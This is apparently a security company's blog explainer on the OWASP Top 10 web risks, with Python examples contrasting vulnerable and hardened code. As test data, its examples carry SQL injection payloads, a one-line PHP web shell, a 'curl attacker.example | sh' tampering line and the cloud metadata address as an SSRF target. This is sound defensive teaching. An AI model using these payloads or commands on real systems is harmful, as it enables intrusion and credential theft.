OWASP Top 10 Common Vulnerabilities

12 Jun 2025
Cybersecurity is crucial for protecting your apps and users, but it can feel overwhelming sometimes.
OWASP (the Open Worldwide Application Security Project, formerly the Open Web Application Security Project) is a nonprofit foundation that works to improve the security of software. It is best known for producing free and open resources focused on web application security, helping organisations and developers understand, identify, and fix vulnerabilities in their software.
The OWASP Top 10 is an awareness document listing the most critical categories of web application security risk. It is revised every few years; the ten categories below are those of the 2021 edition, and every developer, tester, and business should understand them. For each category we give a simple explanation of what the term means, an example of the issue, and how to remediate it.
Broken Access Control
What it means = Users can access data or features they shouldn’t, because the application never checks that the requester is allowed to.
Example = Changing a user ID in the URL (e.g., /account/123 to /account/124) lets someone view another user’s private data, because the server trusts the ID in the request instead of checking who owns the account.
Remediation :
- Enforce server-side authorisation checks on every request, and deny by default.
- Never rely on hiding links or buttons in the UI; an attacker can still send the request directly.
- Apply “least privilege” so users only get access to what they need, and log access-control failures so repeated probing is visible.
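The /account/123 example above, as an added illustration (not code from the original article or from LoughTec): a request handler that decides authorisation on the server for every request, beside the broken behaviour that trusts the ID in the URL. The User class, the ACCOUNTS table and the handle_request signature are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


# Constructed sample data standing in for the accounts table.
ACCOUNTS = {
    123: {"owner_id": 123, "balance": 1500},
    456: {"owner_id": 456, "balance": 80},
}

PATH_RE = re.compile(r"^/account/(\d+)$")


def is_authorised(user: User, account: Optional[dict]) -> bool:
    """Server-side decision: admins may read any account, users only their own.

    A missing account is treated as unauthorised, so the response does not
    reveal which account ids exist (403 for both "not yours" and "not there").
    """
    if account is None:
        return False
    return user.role == "admin" or account["owner_id"] == user.id


def handle_request(user: User, path: str, *, enforce: bool = True):
    """Return (status, body) for GET /account/<id>.

    enforce=False reproduces the broken behaviour: the id in the URL is
    trusted and any logged-in user can read any account (an IDOR). The
    hardened path runs is_authorised() before any data is returned.
    """
    match = PATH_RE.match(path)
    if not match:
        return 404, None
    account = ACCOUNTS.get(int(match.group(1)))
    if enforce and not is_authorised(user, account):
        return 403, None
    if account is None:
        return 404, None
    return 200, account


if __name__ == "__main__":
    bob = User(id=456, role="user")
    print(handle_request(bob, "/account/123", enforce=False))  # leaks Alice's account
    print(handle_request(bob, "/account/123"))                 # (403, None)
    print(handle_request(bob, "/account/456"))                 # Bob's own account
```

The check lives in one function that every handler calls, rather than in the template that decides whether to render a link; that is the difference between authorisation and hiding a button.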
Cryptographic Failures
What it means = Sensitive data isn’t properly protected.
Example = Storing passwords in plain text instead of hashing them.
Remediation :
- Encrypt data in transit with TLS 1.2 or later, and data at rest with a modern authenticated cipher such as AES-GCM.
- Store passwords only as salted hashes from a deliberately slow algorithm such as Argon2id, bcrypt or scrypt; never in plain text, and never with a fast hash such as MD5 or SHA-256 on its own.
- Don’t roll your own cryptography; use proven, maintained libraries.
Injection
What it means = Attackers send crafted input that your app passes into an interpreter (SQL, OS commands, LDAP, etc.) where it is treated as code rather than data, making the app do unintended things.
Example = Entering '; DROP TABLE users; -- into a login form drops the whole users table, when the input is concatenated into the SQL string and the database driver executes stacked statements.
Remediation :
- Use parameterised queries (prepared statements), or an ORM that builds them for you, so user data is never parsed as SQL.
- Validate and sanitise all user input as defence in depth, not as the primary control.
- Never build queries by concatenating or formatting strings with user input.
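SQL injection against a constructed in-memory SQLite table, as an added example (not code from the original article): the vulnerable lookup built by string concatenation beside the parameterised one. Python’s sqlite3 execute() refuses to run more than one statement, so the article’s '; DROP TABLE users; -- payload is rejected by this particular driver; the example instead uses a tautology that returns every row and a UNION that reads the password column, which work here and in any database. The table and its rows are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with two sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-of-alice"), ("bob", "hash-of-bob")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Broken: the username is spliced into the SQL text, so a quote in it
    ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the value travels as a bound parameter and is never parsed as SQL,
    so the same payload just looks for a user with that literal name."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


TAUTOLOGY = "' OR '1'='1"                                 # WHERE clause always true
EXFIL = "' UNION SELECT id, password_hash FROM users --"  # second column now holds hashes

if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, TAUTOLOGY))  # both users
    print(find_user_vulnerable(db, EXFIL))      # password hashes in the username column
    print(find_user_safe(db, TAUTOLOGY))        # []
    print(find_user_safe(db, "alice"))          # [(1, 'alice')]
```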
Insecure Design
What it means = The app’s overall design doesn’t consider security from the start.
Example = Allowing file uploads without validating file types or size.
Remediation :
- Threat-model your app early in development, before the code is written.
- Apply secure design patterns: validate input, centralise authentication and authorisation, and keep security decisions on the server.
- Consider abuse cases (how might an attacker misuse a feature?) and write them into requirements and tests.
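The file-upload example above, worked through as an added illustration (not code from the original article): the abuse cases a threat model would list for an upload feature (oversized bodies, a script disguised as an image, a Content-Type that lies, a user-chosen filename used as a path) and one validation routine that addresses each of them. The size limit, the allowed types and the validate_upload signature are assumptions for the example.

```python
import os
import secrets
from typing import Tuple

MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed product limit

# Allowed types: the magic bytes a genuine file of that type starts with,
# and the extensions it may be stored under.
ALLOWED_TYPES = {
    "image/png": (b"\x89PNG\r\n\x1a\n", {".png"}),
    "image/jpeg": (b"\xff\xd8\xff", {".jpg", ".jpeg"}),
}


def validate_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason_or_storage_name).

    Checks run cheapest-first so an oversized body is rejected before any
    content inspection. The declared Content-Type is only a hint: the
    decision is made on the bytes themselves.
    """
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"          # abuse case: resource exhaustion
    if not data:
        return False, "empty file"
    if declared_type not in ALLOWED_TYPES:
        return False, "type not allowed"        # abuse case: arbitrary file types
    magic, extensions = ALLOWED_TYPES[declared_type]
    if not data.startswith(magic):
        return False, "content does not match declared type"  # abuse case: lying header
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in extensions:
        return False, "extension does not match declared type"  # abuse case: shell.php
    # Never store under the user's name: generate one, so "../../etc/passwd"
    # or "shell.php" never reaches the filesystem. Serve uploads from a
    # location that does not execute scripts.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64            # constructed PNG header
    print(validate_upload("cat.png", "image/png", png))   # accepted, random name
    print(validate_upload("shell.php", "image/png", b"<?php system($_GET['c']); ?>"))
    print(validate_upload("cat.php", "image/png", png))   # right bytes, wrong extension
```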
Security Misconfiguration
What it means = Using default settings or unnecessary features that expose your app.
Example = Leaving an admin console reachable from the internet, running with default credentials, or returning detailed stack traces to users.
Remediation :
- Harden all environments (development, staging, production) from the same reviewed, version-controlled configuration.
- Disable unused features, ports, accounts and sample content.
- Regularly review and update configurations, and automate the checks so drift is caught.
Vulnerable and Outdated Components
What it means = Using old libraries or frameworks with known vulnerabilities.
Example = Running an outdated version of a plugin or library with a publicly known vulnerability (a CVE) that attackers scan for.
Remediation :
- Keep an inventory of your dependencies (including transitive ones) and update them regularly.
- Subscribe to security bulletins for the components you use.
- Use tools like Dependabot or Snyk to automate the checks in your build pipeline.
Identification and Authentication Failures
What it means = Weaknesses in how users are identified, authenticated and kept logged in (passwords, sessions, tokens).
Example = No limit on failed logins, making brute-force attacks easy.
Remediation :
- Throttle or lock out after repeated failed attempts (or require a CAPTCHA), and rate-limit by source address as well as by account so an attacker cannot lock legitimate users out on purpose.
- Use multi-factor authentication (MFA).
- Don’t ship default credentials, and check new passwords against lists of known-breached passwords.
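The failed-login limit above as an added example (not code from the original article): a throttle that locks a key after too many failures inside a window, with an injected clock so the lockout expiry can be exercised without waiting. The thresholds, the LoginThrottle class and the attempt_login helper are assumptions for the example; in practice you run one instance keyed by account and another, with a higher limit, keyed by source IP.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Dict


class LoginThrottle:
    """Track failed logins per key and lock the key out after too many in a window.

    Keying only by account lets an attacker lock real users out at will; keying
    only by IP misses attacks spread across many addresses. Use both.
    """

    def __init__(self, max_failures: int = 5, window_seconds: int = 300,
                 lockout_seconds: int = 900,
                 clock: Callable[[], float] = time.monotonic):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self.clock = clock
        self._failures: Dict[str, deque] = defaultdict(deque)  # key -> failure times
        self._locked_until: Dict[str, float] = {}

    def _prune(self, key: str, now: float) -> None:
        """Drop failures older than the window."""
        q = self._failures[key]
        while q and now - q[0] > self.window:
            q.popleft()

    def is_locked(self, key: str) -> bool:
        until = self._locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:
            del self._locked_until[key]  # lockout expired
            return False
        return True

    def record_failure(self, key: str) -> bool:
        """Register a failed attempt; return True if this one tripped the lockout."""
        now = self.clock()
        self._prune(key, now)
        self._failures[key].append(now)
        if len(self._failures[key]) >= self.max_failures:
            self._locked_until[key] = now + self.lockout
            self._failures[key].clear()
            return True
        return False

    def record_success(self, key: str) -> None:
        self._failures.pop(key, None)


def attempt_login(throttle: LoginThrottle, username: str, password: str,
                  check_credentials: Callable[[str, str], bool]) -> str:
    """Return "locked", "ok" or "denied". The lock is checked before the
    password so a locked account cannot still be probed for the right guess."""
    if throttle.is_locked(username):
        return "locked"
    if check_credentials(username, password):
        throttle.record_success(username)
        return "ok"
    throttle.record_failure(username)
    return "denied"


if __name__ == "__main__":
    throttle = LoginThrottle(max_failures=3, window_seconds=60, lockout_seconds=120)
    creds = lambda u, p: (u, p) == ("alice", "s3cret")  # constructed credential check
    for guess in ("a", "b", "c", "s3cret"):
        print(guess, attempt_login(throttle, "alice", guess, creds))  # last one is "locked"
```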
Software and Data Integrity Failures
What it means = Failing to verify the integrity of code or data.
Example = Installing unsigned or tampered software updates, or pulling dependencies and build plugins from untrusted sources without checking them.
Remediation :
- Sign code and updates, and verify the signature before applying them.
- Pin dependencies and verify integrity checksums (e.g., SHA-256) obtained from a trusted source, such as a lock file with hashes, before installing.
- Protect the CI/CD pipeline and its secrets, and never deserialise untrusted data.
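Checksum verification as an added example (not code from the original article): verifying a downloaded artifact against a published SHA-256 digest, reading digests from a sha256sum-style file, and refusing to install anything that is missing or fails the check. The artifact bytes and the sums file are constructed for the example. The digest has to come from somewhere the attacker cannot also change (release notes, a signed SHA256SUMS file, a lock file in your repository); a checksum fetched from the same server as the artifact only detects corruption, not substitution.

```python
import hashlib
import hmac
from typing import Dict

# Constructed stand-ins for a downloaded installer and the digest published for it.
ARTIFACT = b"#!/bin/sh\necho 'installing widget 1.2.3'\n"
PUBLISHED_SHA256 = hashlib.sha256(ARTIFACT).hexdigest()


def verify_sha256(data: bytes, expected: str) -> bool:
    """Accept "<hex>" or "sha256:<hex>" (the form pip uses in requirements
    files) and compare in constant time."""
    expected = expected.strip().lower()
    if expected.startswith("sha256:"):
        expected = expected[len("sha256:"):]
    if len(expected) != 64:
        return False
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected)


def parse_sums_file(text: str) -> Dict[str, str]:
    """Parse sha256sum output: '<hex>  <name>' or '<hex> *<name>' -> {name: hex}."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        digest, name = parts
        sums[name.lstrip("*")] = digest  # a leading * marks binary mode
    return sums


def install_if_verified(name: str, data: bytes, sums: Dict[str, str]) -> bool:
    """Fail closed: a file absent from the sums list is as bad as a mismatch."""
    expected = sums.get(name)
    return expected is not None and verify_sha256(data, expected)


if __name__ == "__main__":
    sums = parse_sums_file(PUBLISHED_SHA256 + "  install.sh\n")
    print(install_if_verified("install.sh", ARTIFACT, sums))  # True
    tampered = ARTIFACT + b"curl http://attacker.example/x | sh\n"
    print(install_if_verified("install.sh", tampered, sums))  # False
```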
Security Logging and Monitoring Failures
What it means = Not detecting or responding to attacks.
Example = No logs for failed login attempts or suspicious API calls.
Remediation :
- Log critical events (logins and failures, access-control denials, input validation failures, access to sensitive data) with enough context, such as time, source address and account, to reconstruct what happened.
- Ship logs to a central, tamper-resistant store and monitor them with alerting (e.g., a SIEM).
- Establish an incident response plan.
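Detection over the kind of authentication log the remediation asks for, as an added example (not code from the original article): constructed log lines are parsed and scanned per source address for a burst of failures (brute force), failures across many accounts (password spraying), and the case worth paging on, a success from an address that was just brute-forcing. The log format, the thresholds and the function names are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed sample log: a brute force that eventually succeeds, a spray, and noise.
LOG_LINES = """\
2025-06-12T09:00:01Z auth ip=203.0.113.7 user=alice result=fail
2025-06-12T09:00:03Z auth ip=203.0.113.7 user=alice result=fail
2025-06-12T09:00:04Z auth ip=203.0.113.7 user=alice result=fail
2025-06-12T09:00:06Z auth ip=203.0.113.7 user=alice result=fail
2025-06-12T09:00:08Z auth ip=203.0.113.7 user=alice result=fail
2025-06-12T09:00:09Z auth ip=203.0.113.7 user=alice result=success
2025-06-12T09:05:00Z auth ip=198.51.100.9 user=bob result=fail
2025-06-12T09:05:01Z auth ip=198.51.100.9 user=carol result=fail
2025-06-12T09:05:02Z auth ip=198.51.100.9 user=dave result=fail
2025-06-12T09:05:03Z auth ip=198.51.100.9 user=erin result=fail
2025-06-12T09:20:00Z auth ip=192.0.2.5 user=frank result=fail
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse(lines: str) -> List[dict]:
    """Turn log lines into events; lines that do not match are skipped."""
    events = []
    for line in lines.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "ip": m["ip"], "user": m["user"], "result": m["result"],
        })
    return events


def detect(events: List[dict], window: timedelta = timedelta(minutes=5),
           max_failures: int = 5, spray_users: int = 4) -> List[Tuple[str, str]]:
    """Return sorted (alert_kind, ip) pairs using a sliding window per source IP."""
    alerts = set()
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "fail"]
        start = 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1  # slide the window forward
            chunk = fails[start:end + 1]
            if len(chunk) >= max_failures:
                alerts.add(("brute_force", ip))
            if len({e["user"] for e in chunk}) >= spray_users:
                alerts.add(("password_spray", ip))
        # A success from an address that was just brute-forcing is the one to page on.
        if ("brute_force", ip) in alerts and any(
                e["result"] == "success" and e["ts"] >= fails[-1]["ts"] for e in evs):
            alerts.add(("success_after_brute_force", ip))
    return sorted(alerts)


if __name__ == "__main__":
    for kind, ip in detect(parse(LOG_LINES)):
        print(f"ALERT {kind} from {ip}")
```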
Server-Side Request Forgery (SSRF)
What it means = Attackers make your server send requests on their behalf to internal systems or other services that they cannot reach directly.
Example = Submitting a crafted URL that makes the app fetch from internal resources, such as the cloud instance metadata service at http://169.254.169.254/, which can hand over the server’s credentials.
Remediation :
- Validate user-supplied URLs: allow only the schemes you expect, resolve the hostname, and reject private, loopback and link-local addresses before connecting.
- Prefer an allowlist of destination hosts, and do not follow redirects blindly (re-check each hop).
- Isolate internal resources from public-facing apps at the network layer (segmentation and egress filtering).
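URL validation for the fetch-a-URL feature above, as an added example (not code from the original article): a pre-connection check that enforces scheme, rejects embedded credentials and bare IP literals, and applies a host allowlist, plus a post-resolution check to run on every address the hostname resolves to before connecting to that exact address, so a DNS answer of 169.254.169.254 (or a later rebinding) still cannot reach internal services. The allowlist and the function names are assumptions for the example; it does no DNS lookups itself, so it runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed allowlist of hosts this feature may fetch from.
ALLOWED_HOSTS = {"api.example.com", "images.example.com"}


def is_allowed_url(url: str) -> bool:
    """Pre-connection check: https only, no userinfo, a name on the allowlist."""
    try:
        parts = urlsplit(url)
        if parts.scheme != "https":
            return False  # blocks http://, file://, gopher://, ...
        if parts.username is not None or parts.password is not None:
            return False  # https://api.example.com@evil.example/ has host evil.example
        host = parts.hostname
        if not host:
            return False
        try:
            ipaddress.ip_address(host)
            return False  # bare IP literals (incl. [::1]) bypass a name allowlist
        except ValueError:
            pass
        if parts.port not in (None, 443):
            return False
        return host.rstrip(".").lower() in ALLOWED_HOSTS
    except ValueError:
        return False  # malformed URL or port: fail closed


def is_public_address(addr: str) -> bool:
    """Post-resolution check for each IP the allowed hostname resolves to."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 is really 10.0.0.1
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


if __name__ == "__main__":
    for url in ("https://api.example.com/v1/users",
                "http://169.254.169.254/latest/meta-data/",
                "https://api.example.com@evil.example/",
                "https://api.example.com:8443/"):
        print(url, is_allowed_url(url))
    for addr in ("8.8.8.8", "169.254.169.254", "::ffff:10.0.0.1"):
        print(addr, is_public_address(addr))
```

Both checks are needed: the first stops obvious payloads, the second is what actually protects the metadata service, and the connection must be made to the IP that passed the check rather than resolved a second time by the HTTP library.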
Securing your application starts with awareness and planning. The OWASP Top 10 helps you focus on the most critical risks, so you can build trust with your users and avoid costly breaches.
Next Steps :
- Review your app for these vulnerabilities.
- Train your team on secure coding practices.
- Integrate security testing (dependency scanning, static analysis, dynamic testing) into your development pipeline.
LoughTec are cyber security experts. If you want to find out more about how LoughTec can help protect your business, see the recommended information and options below.
Click to find out more about how much a cyber attack could potentially cost your business.
Click to find out more about Security Operations Centre SOC 24-7-365 protection.
Click to find out more about Staff Cyber Security Awareness Training.
Click to find out more about Ransomware Protection.
You can also see more about us in our case studies and testimonials sections.